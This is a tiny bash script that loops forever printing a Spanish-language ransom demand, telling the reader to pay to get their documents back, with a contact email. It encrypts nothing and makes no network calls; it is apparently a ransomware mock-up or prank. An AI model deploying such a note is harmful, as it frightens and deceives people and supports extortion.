#! /bin/bash

while [ true ]
 do
  echo "-------------------SI QUIERES TUS DOCUMENTOS DE REGRESO DEBES PAGAR RESCATE-----------------"
  echo "-------------------------MAS INFO: hackeandomundo@hack.com-------------------------"
done
